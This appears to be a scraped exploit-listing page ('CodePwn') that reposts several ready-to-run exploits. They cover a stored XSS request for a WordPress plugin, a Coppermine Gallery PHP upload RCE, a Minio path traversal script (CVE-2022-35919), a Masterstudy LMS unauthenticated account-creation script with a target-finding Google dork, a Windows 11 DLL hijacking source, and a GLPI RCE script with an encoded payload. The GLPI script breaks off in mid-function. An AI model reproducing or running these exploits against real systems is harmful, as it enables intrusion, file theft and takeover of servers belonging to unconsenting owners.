Latest exploits :: CodePwn

<pre><code># Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS # Date: 2023-09-05 # Exploit Author: Furkan Karaarslan # Category : Webapps # Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php # Version: 4.7 (REQUIRED) # Tested on: Windows/Linux ---------------------------------------------------------------------------------------------------- 1-First install sonar music plugin. 2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist 3-Press the Add new playlist button 4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist 5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/ 6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script> Bingoo Request: POST /wp/wordpress/wp-comments-post.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 155 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/wp/wordpress/album_slug/test/ Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486 Connection: close comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5 </code></pre>

<pre><code>Exploit Title: coppermine-gallery 1.6.25 RCE Application: coppermine-gallery Version: v1.6.25 Bugs: RCE Technology: PHP Vendor URL: https://coppermine-gallery.net/ Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip Date of found: 05.09.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps 1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip. $ cat >> test.php <?php echo system('cat /etc/passwd'); ?> $ zip test.zip test.php 1. Login to account 2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php 3. Upload zip file 4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.php poc request POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1 Host: localhost Content-Length: 630 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c Connection: close ------WebKitFormBoundaryi1AopwPnBYPdzorF Content-Disposition: form-data; name="plugin"; filename="test.zip" Content-Type: application/zip PK �����b%Wz½µ}(���(�����test.phpUT �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?> PK �����b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j����� ------WebKitFormBoundaryi1AopwPnBYPdzorF Content-Disposition: form-data; name="form_token" 50982f2e64a7bfa63dbd912a7fdb4e1e ------WebKitFormBoundaryi1AopwPnBYPdzorF Content-Disposition: form-data; name="timestamp" 1693905214 ------WebKitFormBoundaryi1AopwPnBYPdzorF-- </code></pre>

<pre><code># Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal # Date: 2023-09-02 # Exploit Author: Jenson Zhao # Vendor Homepage: https://min.io/ # Software Link: https://github.com/minio/minio/ # Version: Up to (excluding) 2022-07-29T19-40-48Z # Tested on: Windows 10 # CVE : CVE-2022-35919 # Required before execution: pip install minio,requests import urllib.parse import requests, json, re, datetime, argparse from minio.credentials import Credentials from minio.signer import sign_v4_s3 class MyMinio(): secure = False def __init__(self, base_url, access_key, secret_key): self.credits = Credentials( access_key=access_key, secret_key=secret_key ) if base_url.startswith('http://') and base_url.endswith('/'): self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' elif base_url.startswith('https://') and base_url.endswith('/'): self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' self.secure = True else: print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n') def poc(self): datetimes = datetime.datetime.utcnow() datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ') urls = urllib.parse.urlparse(self.url) headers = { 'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'X-Amz-Date': datetime_str, 'Host': urls.netloc, } headers = sign_v4_s3( method='POST', url=urls, region='', headers=headers, credentials=self.credits, content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', date=datetimes, ) if self.secure: response = requests.post(url=self.url, headers=headers, verify=False) else: response = requests.post(url=self.url, headers=headers) try: message = json.loads(response.text)['Message'] pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)' matches = re.findall(pattern, message) if matches: print('There is CVE-2022-35919 problem with the url!') print('The contents of the /etc/passwd file are as follows:') for match in matches: print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5], match[6])) else: print('There is no CVE-2022-35919 problem with the url!') print('Here is the response message content:') print(message) except Exception as e: print( 'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:') print(response.text) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/") parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin") parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin") args = parser.parse_args() minio = MyMinio(args.url, args.accesskey, args.secretkey) minio.poc() </code></pre>

<pre><code># Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation # Google Dork: inurl:/user-public-account # Date: 2023-09-04 # Exploit Author: Revan Arifio # Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/ # Version: <= 3.0.17 # Tested on: Windows, Linux # CVE : CVE-2023-4278 import requests import os import re import time banner = """ _______ ________ ___ ___ ___ ____ _ _ ___ ______ ___ / ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \ | | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) | | | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ < | |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) | \_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/ ====================================================================================================== || Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation || || Author : https://github.com/revan-ar || || Vendor Homepage : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/ || || Support : https://www.buymeacoffee.com/revan.ar || ====================================================================================================== """ print(banner) # get nonce def get_nonce(target): open_target = requests.get("{}/user-public-account".format(target)) search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text) if search_nonce[1] != None: return search_nonce[1] else: print("Failed when getting Nonce :p") # privielege escalation def privesc(target, nonce, username, password, email): req_data = { "user_login":"{}".format(username), "user_email":"{}".format(email), "user_password":"{}".format(password), "user_password_re":"{}".format(password), "become_instructor":True, "privacy_policy":True, "degree":"", "expertize":"", "auditory":"", "additional":[], "additional_instructors":[], "profile_default_fields_for_register":[], "redirect_page":"{}/user-account/".format(target) } start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data) if start.status_code == 200: print("[+] Exploit Success !!") else: print("[+] Exploit Failed :p") # URL target target = input("[+] URL Target: ") print("[+] Starting Exploit") plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target)) plugin_version = re.search("Stable tag: (.+)", plugin_check.text) int_version = plugin_version[1].replace(".", "") time.sleep(1) if int(int_version) < 3018: print("[+] Target is Vulnerable !!") # Credential email = input("[+] Email: ") username = input("[+] Username: ") password = input("[+] Password: ") time.sleep(1) print("[+] Getting Nonce...") get_nonce = get_nonce(target) # Get Nonce if get_nonce != None: print("[+] Success Getting Nonce: {}".format(get_nonce)) time.sleep(1) # Start PrivEsc privesc(target, get_nonce, username, password, email) # ---------------------------------- else: print("[+] Target is NOT Vulnerable :p") </code></pre>

<pre><code>#--------------------------------------------------------- # Title: Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced) # Date: 2023-09-01 # Author: Moein Shahabi # Vendor: https://www.microsoft.com # Version: Windows 11 Pro 10.0.22621 # Tested on: Windows 11_x64 [eng] #--------------------------------------------------------- Description: HelpPane object allows us to force Windows 11 to DLL hijacking Instructions: 1. Compile dll 2. Copy newly compiled dll "apds.dll" in the "C:\Windows\" directory 3. Launch cmd and Execute the following command to test HelpPane object "[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID('8CEC58AE-07A1-11D9-B15E-000D56BFE6EE'))" 4. Boom DLL Hijacked! ------Code_Poc------- #pragma once #include <Windows.h> // Function executed when the thread starts extern "C" __declspec(dllexport) DWORD WINAPI MessageBoxThread(LPVOID lpParam) { MessageBox(NULL, L"DLL Hijacked!", L"DLL Hijacked!", NULL); return 0; } PBYTE AllocateUsableMemory(PBYTE baseAddress, DWORD size, DWORD protection = PAGE_READWRITE) { #ifdef _WIN64 PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress; PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew); PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader; // Create some breathing room baseAddress = baseAddress + optionalHeader->SizeOfImage; for (PBYTE offset = baseAddress; offset < baseAddress + MAXDWORD; offset += 1024 * 8) { PBYTE usuable = (PBYTE)VirtualAlloc( offset, size, MEM_RESERVE | MEM_COMMIT, protection); if (usuable) { ZeroMemory(usuable, size); // Not sure if this is required return usuable; } } #else // x86 doesn't matter where we allocate PBYTE usuable = (PBYTE)VirtualAlloc( NULL, size, MEM_RESERVE | MEM_COMMIT, protection); if (usuable) { ZeroMemory(usuable, size); return usuable; } #endif return 0; } BOOL ProxyExports(HMODULE ourBase, HMODULE targetBase) { #ifdef _WIN64 BYTE jmpPrefix[] = { 0x48, 0xb8 }; // Mov Rax <Addr> BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Rax #else BYTE jmpPrefix[] = { 0xb8 }; // Mov Eax <Addr> BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Eax #endif PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)targetBase; PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew); PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader; PIMAGE_DATA_DIRECTORY exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; if (exportDataDirectory->Size == 0) return FALSE; // Nothing to forward PIMAGE_EXPORT_DIRECTORY targetExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress); if (targetExportDirectory->NumberOfFunctions != targetExportDirectory->NumberOfNames) return FALSE; // TODO: Add support for DLLs with mixed ordinals dosHeader = (PIMAGE_DOS_HEADER)ourBase; ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew); optionalHeader = &ntHeaders->OptionalHeader; exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; if (exportDataDirectory->Size == 0) return FALSE; // Our DLL is broken PIMAGE_EXPORT_DIRECTORY ourExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress); // ---------------------------------- // Make current header data RW for redirections DWORD oldProtect = 0; if (!VirtualProtect( ourExportDirectory, 64, PAGE_READWRITE, &oldProtect)) { return FALSE; } DWORD totalAllocationSize = 0; // Add the size of jumps totalAllocationSize += targetExportDirectory->NumberOfFunctions * (sizeof(jmpPrefix) + sizeof(jmpSuffix) + sizeof(LPVOID)); // Add the size of function table totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(INT); // Add total size of names PINT targetAddressOfNames = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfNames); for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) totalAllocationSize += (DWORD)strlen(((LPCSTR)((PBYTE)targetBase + targetAddressOfNames[i]))) + 1; // Add size of name table totalAllocationSize += targetExportDirectory->NumberOfNames * sizeof(INT); // Add the size of ordinals: totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(USHORT); // Allocate usuable memory for rebuilt export data PBYTE exportData = AllocateUsableMemory((PBYTE)ourBase, totalAllocationSize, PAGE_READWRITE); if (!exportData) return FALSE; PBYTE sideAllocation = exportData; // Used for VirtualProtect later // Copy Function Table PINT newFunctionTable = (PINT)exportData; CopyMemory(newFunctionTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfFunctions * sizeof(INT)); exportData += targetExportDirectory->NumberOfFunctions * sizeof(INT); ourExportDirectory->AddressOfFunctions = (DWORD)((PBYTE)newFunctionTable - (PBYTE)ourBase); // Write JMPs and update RVAs in the new function table PINT targetAddressOfFunctions = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfFunctions); for (DWORD i = 0; i < targetExportDirectory->NumberOfFunctions; i++) { newFunctionTable[i] = (DWORD)(exportData - (PBYTE)ourBase); CopyMemory(exportData, jmpPrefix, sizeof(jmpPrefix)); exportData += sizeof(jmpPrefix); PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfFunctions[i]); CopyMemory(exportData, &realAddress, sizeof(LPVOID)); exportData += sizeof(LPVOID); CopyMemory(exportData, jmpSuffix, sizeof(jmpSuffix)); exportData += sizeof(jmpSuffix); } // Copy Name RVA Table PINT newNameTable = (PINT)exportData; CopyMemory(newNameTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfNames * sizeof(DWORD)); exportData += targetExportDirectory->NumberOfNames * sizeof(DWORD); ourExportDirectory->AddressOfNames = (DWORD)((PBYTE)newNameTable - (PBYTE)ourBase); // Copy names and apply delta to all the RVAs in the new name table for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) { PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfNames[i]); DWORD length = (DWORD)strlen((LPCSTR)realAddress); CopyMemory(exportData, realAddress, length); newNameTable[i] = (DWORD)((PBYTE)exportData - (PBYTE)ourBase); exportData += length + 1; } // Copy Ordinal Table PINT newOrdinalTable = (PINT)exportData; CopyMemory(newOrdinalTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNameOrdinals, targetExportDirectory->NumberOfFunctions * sizeof(USHORT)); exportData += targetExportDirectory->NumberOfFunctions * sizeof(USHORT); ourExportDirectory->AddressOfNameOrdinals = (DWORD)((PBYTE)newOrdinalTable - (PBYTE)ourBase); // Set our counts straight ourExportDirectory->NumberOfFunctions = targetExportDirectory->NumberOfFunctions; ourExportDirectory->NumberOfNames = targetExportDirectory->NumberOfNames; if (!VirtualProtect( ourExportDirectory, 64, oldProtect, &oldProtect)) { return FALSE; } if (!VirtualProtect( sideAllocation, totalAllocationSize, PAGE_EXECUTE_READ, &oldProtect)) { return FALSE; } return TRUE; } // Executed when the DLL is loaded (traditionally or through reflective injection) BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { HMODULE realDLL; switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: CreateThread(NULL, NULL, MessageBoxThread, NULL, NULL, NULL); realDLL = LoadLibrary(L"C:\\Windows\\System32\\apds.dll"); if (realDLL) ProxyExports(hModule, realDLL); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } -------------------------- </code></pre>

<pre><code>#!/usr/bin/env python3 #Exploit Title: GLPI GZIP(Py3) 9.4.5 - RCE #Date: 08-30-2021 #Exploit Authors: Brian Peters & n3rada #Vendor Homepage: https://glpi-project.org/ #Software Link: https://github.com/glpi-project/glpi/releases #Version: 0.8.5-9.4.5 #Tested on: Exploit ran on Kali 2021. GLPI Ran on Windows 2019 #CVE: 2020-11060 # Built-in imports import argparse import random import re import string from datetime import datetime # Third party library imports import requests from lxml import html # https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt PAYLOAD = ";)qRJ*_O88Ux-0cRlA`B]5y[r.no5bKUb2EzEW34O(K~.Oa}pO}1F956/fp@mz`oQqahP+@[/tiLy:]YBmFrRmc*Jt}VxM^@(9BeSTo|zQ}6d/zF|LOMqSy:Nk5hCLU.s-Tx;fHci?1],*9}r;,FmIDZ5^|0SNYjN}H7z{(fPe1}~6u8i^_S38:64w+Q6rg*h4PZ`;h)mB*IeUhRLk;~}OVB`:XTKPnT4XS9pzLrze,[^Y/qnP5KEEo6t+ydw7m,@S/:_dka*4BAXKk?NvSgcV41P~r0iGI?/}lXrvB+94e3/E]aEUPVKmgPE[[Dc@Vjy.2mW+if^)c@n8a[`qt-0,S+sDM+RSj_M0V(@,I)SLHZg*rjV4HTKyQo9-[6OL7xhZKQDx03?Tc{|wo32~*QHgH;{@SPcPJ+}tXPPS~-@g:I-Zo+nxo+Y,pFjX8(.;Xr:jD6fx2IXJUMw.m{F7(@RFA6XHS{c`v(W~[yFLMvfBxiP;a58,w`pWEuNtKE~@N.t9fRDOqh1o.^G@W/rr5S_?8Ar/c[Ok}e|:i]P:DUB^o7*pUp[F6hml-32MT)@ih/f`T/~^r(.[+fLPhrD4aBO8u/4gPlr-6.}Mz(OTmHSO8XYa]^3|.*ASPLaB.*gzLUX|4,W_|E|M7all3?XXJ}Cy)6:M2fgiT@155[y0)^@HUXC+Iui9+-z^5dTm*{W}jSB@p8o-fHF)0gsa83,AjbbX]l0I{}k?}[,I`SgGyfZi1c2T@~lTM]}8-{H3DuMFd5+iAr?g9~~0P)AU8u`nk?a()`T@L;UMa@{zS9h7HTD*D1W3x*KNAmk7NXX-s8uQumOY3TLKnN4ls?*sPS/gS^O(/[ctaJYlJ-16_XqifQR(U?a1L@|;^3GHPg?J*mY)+[i(l4GBKj5r6Pkv-QxzVhgKKu9G*6~V6T)DiUK.Pxfy*X*QADUIB`L*GMYh0k[Lpk8eBYheF2yli-Czv7{Z:A4TDYo?PzLk6K5[0*vDbn53oPA(Np|U|AKVSqe/^bP~lkxPcUWXC-jt{27G.Fu;W`uu+cjgo5]m39R:3csXshb_EJ[p2i5~RD0.ZDYUa^Ev@mbA._4F@uVRx/LjW2h{tEME;tYpE,e55a*|lJ./kE1n]v_{/U8uyX:L/5ifJ^^WkTZ/nVC@,7oY^mMPV(-9stYKZWyg9fGtj+R4]Q.:.J5[;;v+rCL:O[JBHZ)Nk8s4(nbS*K]VH8,;Ya9V/.CwXV0X/3Rd{*~QeP6rn4|?V2n6vC|WtAU1JKba-INX`wmYI@}h)BO,^NHERJF~rMF]oz1?aaJI@H0^K`WG*8auteXa3svOvIcSqF6q?eyNA2sr)ai;nczU02qrz?s@W}N|VQr/.}R27*B4bA8?LrrbbOsR/VG[]Fii/vC9v;R7z76H,:0Lb(,qr}8Q_|;KCQGg(|I2*X3Nk-@GC[[7d)055J,/8{/JmL/odlgA8-O|?1yw6QmJjZxb;j[cFdy/B]/t?CG/y}Qyq|.RtE(rJ``i9ZxQarkR_yKlz21}~vpl~eLSV1+l/gi;k(]GdS^FueL7VMRa}{B@JUOy4gXP-By:)-jktZfg~f]Gz?D:UVqSJTAn_zLUQqPNHATd(2.uFeQhoO.L]EknPP3NZiLa8z1,;j/{p}k/V3KU:dgB4K}-U@Qx)g1wRI*]YyI6V^Ibl^4a*vwB+8*EiD^TAau8|]NAL(4Bn}*N+AfjHLqYDdbIuhYdP`~W0K@eM}*kj)t9`H(}fTh_0M@2kgUIBX-4dx05+)hIXtX]YtG*Y*dakDk.}9ZQeiGLnChu(S+Nk{:ZMA/HXEGz5L^)5Dh6qno8:Im[{aL_,eaw[ictOZav,APv}oRjmXp)sUsW5my2gm5boX}e-jQ38N3@RUe)J^|QF[IrZG*MfGkRw;ZK+~/cL4M38aBX8b7::Qq;(H+}yMEQV0Esr~zmd|uL4E,q6DsaD~b9Z;J5{At(/fKvOmXTIXiY.*DT42z62gPyW1;Ev*8]@jp{KgYnj1RCocqe~*tvcbWC2CRpA*Gjz(msc*KtdmW?fBsxzc/tle?@gVzi9sTGAMTJi/flQtFVJF^/Ls|RK.lQ`/m42oVGkM`+~V~I@g(9]cRR,`~D;k~TtM3e|):*vAg@LH55{:d:x4QkVb^R{Rll+CKMxa,rzSxG+D)L?ePUCgwZiMp.FwZe^]3gZOmU0kcSR-sc?@lQa)+vAMW7B}k?pF84QoQVIDE[W*4kKn~/GBQ[1Eg;46MRTMO3V31g^8yqz)--JO}2i;(oBbtyNd0XkM+_luyJH_NuZ?tZu|5.+Z.(,7j*(87Xya]mdZr_w?SeC{bE0@5]Nit?tyby`,rI6}.@@[42X]C)K,Tq[q/~feVi1mJl(CxPz`:*ZKl]J2}L;7.*tzTCC(s-BWgD9GzQpk]r*AP_GEQ]Cit6GRCbe;yZ}nreK+2q-ZPDrs^-G29dS@m4/4q*GnabGJW}.oahC88:]m?2hJrpy){pGcOf|7o3lxDUkST*Lham4z4B~}H3uLN{-,~+32@m[l|Rur9|jU_WqKUh+(D6i2[:(sR*)nc(E-2y}Rq]:,VsMIv1dot0m)3@aAARUMNMDxSMsq+O|O]y?_T,QvgXRQrA6c+r`zDr9NpNb2Eoq/?M},HgicpE@/NIjt;Sf^MaW`e^1ADhFcXqe4,KMhu1~GG8dlEU1|wE9NIoxjC(g`cIFq0^rItTK76{h1[SJLCn*w(w|(7F0Fva+~y{yzn1D2x4c-lv?p}wu9pF.?tlaB8a_~zu/4U0~j1/N?{E}1IZ`I{AM@GW{h{Ot1Pb@W@0Ha+7O?N|?B)ti20MTJ0Pm*g-~j/9L;^ouu?-O3-hDNt^0g3w:X92bA}ag_sZrJ3{}b|A^r}y/f(T.2{s`t;t1FGp83bT7lFRE.1;uas;(LIyNJ3OsoC;~-K,MToT+~~AlkS(;i0Pob*.;6+,s|ae2(cP.sF@`Tps6_+heNE_kKNVXk{Od8ETI`}q5):F?gO~ZBjd7G}Iy*QOOSDlTQQ-WsKJCu7Q~vH}NotKuTpwO8;mEElVqQ,D,mw56)}c9/?aooObfp+NRG9(L}b2hm`U9TxFxE5y}Nw0,sSN-jcj6q[;6Q~Jd*@kknF]XNDt(3HQKdoRT;2mYoMlM}Rn^S{ekyqsT:OX1;z8pUxT-XE)o?gXqNV].hEYrr4`Hy:aDh^4K1^|OzS{]7dZ]]--(Lp?{AIlUyHGf09PKy@r?:Dx-COsMlWeCcSp*3v_W(PWJHex:o9Uf:2Zvvfhx*eFT:g{@o]3}Y)uLO,bcugjJ0v/hq(LKCnr/zowwK0bqaQ^.ka5nE0U7/9+aokofDSyi9E|BUa[9*3vkr9Jxg)3Sx6bY.d5sBGWK+8IYEzqlpj?7;j{l^;B2?u;+UAn}1J5C:1DbcV,U@_OLL{aLFY`cQA7JnL[Tz6j-U9qmVy7;706VP0R`6Zmn_aRZE/P)R~A9lYosxX4;[?9/|O?sJSXZoVvNgIH[-D?o}e]_T7GJPu6Vk,SY{P?)b5oiGsGV.0{@,4JuY0a7d(P)`YX1~Iq[]K,?lNe-V+}QGG}T^~2l)BX9khRsxJB(rf,ZVz)dtCU3Br.8.yu~gMo7aD/]m/xrH~i]^]A*HLgFFY/AlVqLTa17qm1qcU;W4x;8,^;*|TN(YYkm?0Xbvsy*{))pfUG02mvBXNeH;)OZJ~6Z`csCb)R:Ute]2Nj90K{`M;6V1+YKbM;B,O/*~g-ucwb2|`cOS?D8Rt]X}6FI^okmw4~PI({VX8;KYMJRv]w2Jc/udD@[wOQ,huX76iQ}HqSgdiTalFVdujJwcaof}Z1MbK{/d;2{RM3rDRF4OSZbN2t+:TW,,v5m+1nWQbaoR(54f-[^yv*GCyzGCN^M9d@.VL4:^[/}6kUcCSz?`J*.CiqjJjQJkZkGxY}u*shO4x38t+`FW};|Go2HRAsSHJJN@``HVmacO[rn|Q+1{hA3yqEg.sL+5S)_Ol5|,kM@RET,7f[k;Xi?Mal?ZnK,*_NQWZy+cr^Cf9RA^Nv5|a@Jp2bD*HT`+Po2laU]LK,1z]LRk_-~keiS^Y8:Zh`.W}LNH`C8fzT/zv2XE requests.packages.urllib3.disable_warnings() class GlpiBrowser: """_summary_""" def __init__(self, url: str, user: str, password: str, platform: str): """ Initialize the GlpiBrowser with required attributes. Args: url (str): The URL of the target GLPI instance. user (str): The username for authentication. password (str): The password for authentication. platform (str): The platform of the target (either 'windows' or 'unix'). """ self.__url = url self.__user = user self.__password = password self.accessible_directory = "pics" if "win" in platform.lower(): self.__platform = "windows" else: self.__platform = "unix" self.__session = requests.Session() self.__session.verify = False self.__shell_name = None print(f"[+] {self!s}") # Dunders def __repr__(self) -> str: """Return a machine-readable representation of the browser instance.""" return f"<GlpiBrowser(url={self.__url!r}, user={self.__user!r}), password={self.__password!r}, plateform={self.__platform!r}>" def __str__(self) -> str: """Return a human-readable representation of the browser instance.""" return f"GLPI Browser targeting {self.__url!r} ({self.__platform!r}) with following credentials: {self.__user!r}:{self.__password!r}." # Public methods def is_alive(self) -> bool: """ Check if the target GLPI instance is alive and responding. Returns: bool: True if the GLPI instance is up and responding, otherwise False. """ try: self.__session.get(url=self.__url, timeout=3) except Exception as error: print(f"[-] Impossible to reach the target.") print(f"[x] Root cause: {error}") return False else: print(f"[+] Target is up and responding.") return True def login(self) -> bool: """ Attempt to login to the GLPI instance with provided credentials. Returns: bool: True if login is successful, otherwise False. """ html_text = self.__session.get(url=self.__url, allow_redirects=True).text csrf_token = self.__extract_csrf(html=html_text) name_field = re.search(r'name="(.*)" id="login_name"', html_text).group(1) pass_field = re.search(r'name="(.*)" id="login_password"', html_text).group(1) login_request = self.__session.post( url=f"{self.__url}/front/login.php", data={ name_field: self.__user, pass_field: self.__password, "auth": "local", "submit": "Post", "_glpi_csrf_token": csrf_token, }, allow_redirects=False, ) return login_request.status_code == 302 def create_network(self, datemod: str) -> None: """ Create a new network with the specified attributes. Args: datemod (str): The timestamp indicating when the network was modified. """ creation_request = self.__session.post( f"{self.__url}/front/wifinetwork.form.php", data={ "entities_id": "0", "is_recursive": "0", "name": "PoC", "comment": PAYLOAD, "essid": "RCE", "mode": "ad-hoc", "add": "ADD", "_glpi_csrf_token": self.__extract_csrf( self.__session.get(f"{self.__url}/front/wifinetwork.php").text ), "_read_date_mod": datemod, }, ) if creation_request.status_code == 302: print("[+] Network created") def wipe_networks(self, padding, datemod): """ Wipe all networks. Args: padding (str): Padding string for ESSID. datemod (str): The timestamp indicating when the network was modified. """ print("[*] Wiping networks...") all_networks_request = self.__session.get( f"{self.__url}/front/wifinetwork.php#modal_massaction_contentb5e83b3aa28f203595c34c5dbcea85c9" ) webpage = html.fromstring(all_networks_request.content) for rawlink in set( link for link in webpage.xpath("//a/@href") if "wifinetwork.form.php?id=" in link ): network_id = rawlink.split("=")[-1] print(f"\tDeleting network id: {network_id}") self.__session.post( f"{self.__url}/front/wifinetwork.form.php", data={ "entities_id": "0", "is_recursive": "0", "name": "PoC", "comment": PAYLOAD, "essid": "RCE" + padding, "mode": "ad-hoc", "purge": "Delete permanently", "id": network_id, "_glpi_csrf_token": self.__extract_csrf(all_networks_request.text), "_read_date_mod": datemod, }, ) def edit_network(self, padding: str, datemod: str) -> None: """_summary_ options: padding (str): 